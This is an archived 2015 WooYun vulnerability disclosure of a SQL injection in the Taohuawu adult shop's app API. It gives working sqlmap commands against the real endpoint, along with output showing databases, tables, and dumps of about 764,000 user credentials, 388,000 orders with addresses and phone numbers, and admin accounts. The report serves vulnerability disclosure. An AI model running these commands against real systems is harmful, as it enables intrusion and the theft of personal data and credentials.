当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118734

漏洞标题:桃花坞商城SQL注入漏洞(70万用户信息+30万订单信息+各种管理员信息)

相关厂商:桃花坞商城

漏洞作者: blackchef

提交时间:2015-06-09 16:00

修复时间:2015-07-27 13:48

公开时间:2015-07-27 13:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

成人电商啊,订单满天飞

详细说明:

APP客户端上的一个漏洞,话说哥们是搜Nice客户端,被推荐安装的这个APP,真心不是刚需安装啊。。。结果发现这个洞,解释多了都是泪啊,直接上poc
数据库

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" --dbs


[00:15:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:15:46] [INFO] fetching database names
[00:15:46] [INFO] the SQL query used returns 6 entries
[00:15:46] [INFO] resumed: information_schema
[00:15:46] [INFO] resumed: easy_taodata
[00:15:46] [INFO] resumed: jp_taodata
[00:15:46] [INFO] resumed: oto
[00:15:46] [INFO] resumed: taodata
[00:15:46] [INFO] resumed: zhidao_taohwu
available databases [6]:
[*] easy_taodata
[*] information_schema
[*] jp_taodata
[*] oto
[*] taodata
[*] zhidao_taohwu


200多张表

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata --tables


Database: taodata
[203 tables]
+------------------------------+
| ecs_category_2014-04-25 |
| ecs_goods_2014-04-25 |
| ecs_goods_gallery_2014-04-25 |
| app_activity_goods |
| app_activity_time |
| app_android_category |
| app_article |
| app_article_category |
| app_article_label |
| app_article_reply |
| app_bar |
| app_bar_at |
| app_bar_blackfans |
| app_bar_category |
| app_bar_checkin |
| app_bar_collect |
| app_bar_comment |
| app_bar_comment20150107 |
| app_bar_fans |
| app_bar_img |
| app_bar_letter |
| app_bar_points_log |
| app_bar_power |
| app_bar_praise |
| app_channel |
| app_cpa_report |
| app_field_category |
| app_index_issue |
| app_index_issue_category |
| app_ios_category |
| app_open_apply |
| app_open_apply20140926 |
| app_recommend_download |
| app_show_accuse |
| app_show_collect |
| app_show_comment |
| app_show_field |
| app_show_img |
| app_show_praise |
| app_topic |
| app_user_idea |
| aws_answer |
| aws_question |
| drp_goods_attr |
| drp_goods_gallery |
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_keywords |
| ecs_ad_keywords_click |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_adv |
| ecs_adv_pic |
| ecs_affiliate_log |
| ecs_agency |
| ecs_app_goods |
| ecs_area_region |
| ecs_article |
| ecs_article_attr |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_filtrate_brand |
| ecs_cat_filtrate_price |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_comment_reply |
| ecs_coupon |
| ecs_coupon_log |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_express_log |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_adv_pic |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_copy |
| ecs_goods_gallery |
| ecs_goods_insale |
| ecs_goods_ios |
| ecs_goods_sales |
| ecs_goods_stock |
| ecs_goods_third |
| ecs_goods_third_meal |
| ecs_goods_type |
| ecs_group_goods |
| ecs_group_up |
| ecs_jiajiagou |
| ecs_keywords |
| ecs_lasting_ticket |
| ecs_link_goods |
| ecs_mail_send_log |
| ecs_mail_templates |
| ecs_member_price |
| ecs_message |
| ecs_mobile_adv_pic |
| ecs_nav |
| ecs_new2_page_issue |
| ecs_new_page_issue |
| ecs_order_360info |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_order_info20150104 |
| ecs_order_info_extend |
| ecs_order_yhj |
| ecs_orderlog |
| ecs_outbound_goods |
| ecs_pack |
| ecs_package_goods |
| ecs_page_issue |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_postmoney_rule |
| ecs_promotion_cfg |
| ecs_qianggou |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_role_user |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_sex_test |
| ecs_sex_test_log |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_sms |
| ecs_snatch_log |
| ecs_stats |
| ecs_storage_goods |
| ecs_subscibe |
| ecs_suppliers |
| ecs_tag |
| ecs_tag_cat |
| ecs_tag_cat_relation |
| ecs_tag_relation |
| ecs_taocan |
| ecs_template |
| ecs_topic |
| ecs_topic_issue |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_direct_price |
| ecs_user_feed |
| ecs_user_gift_coupon |
| ecs_user_login_log |
| ecs_user_rank |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wap_category |
| ecs_wholesale |
| erp_action_log |
| erp_admin |
| erp_permission |
| erp_project |
| erp_purchase |
| erp_purchase_detail |
| getbonus_log |
| ltb_session |
| stats_click |
| stats_goods |
| stats_order |
| stats_pv |
| stats_search_keys |
| stats_user_order |
| temp_Stat |
| temp_order |
| user_info |
| user_login_log |
+------------------------------+


76万用户手机和密码等信息

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_users -C user_name,password,user_id --dump  --charset=UTF-8


[00:43:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:43:28] [INFO] fetching columns 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 3 entries
[00:43:28] [INFO] resumed: user_id
[00:43:28] [INFO] resumed: mediumint(8) unsigned
[00:43:28] [INFO] resumed: user_name
[00:43:28] [INFO] resumed: varchar(150)
[00:43:28] [INFO] resumed: password
[00:43:28] [INFO] resumed: varchar(32)
[00:43:28] [INFO] fetching entries of column(s) 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 764045 entries


38万订单数据

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_order_info --dump -C consignee,address,mobile,user_id --charset=UTF-8


[00:45:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:45:24] [INFO] fetching columns for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 101 entries
[00:45:24] [INFO] fetching entries for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 388531 entries


管理员数据

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_admin_user --dump --charset=UTF-8


[00:49:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:49:00] [INFO] fetching columns for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 14 entries
[00:49:00] [INFO] resumed: user_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: user_name
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: email
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: password
[00:49:00] [INFO] resumed: varchar(32)
[00:49:00] [INFO] resumed: add_time
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_login
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_ip
[00:49:00] [INFO] resumed: varchar(15)
[00:49:00] [INFO] resumed: action_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: nav_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: lang_type
[00:49:00] [INFO] resumed: varchar(50)
[00:49:00] [INFO] resumed: agency_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: suppliers_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: todolist
[00:49:00] [INFO] resumed: longtext
[00:49:00] [INFO] resumed: is_kf
[00:49:00] [INFO] resumed: tinyint(1)
[00:49:00] [INFO] fetching entries for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 15 entries

漏洞证明:

用户信息

taohuawuyonghu.png


订单信息

taohuawudingdan.png


管理员信息

taohuawuguanliyuan.png


修复方案:

看着改吧

版权声明:转载请注明来源 blackchef@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-12 13:47

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无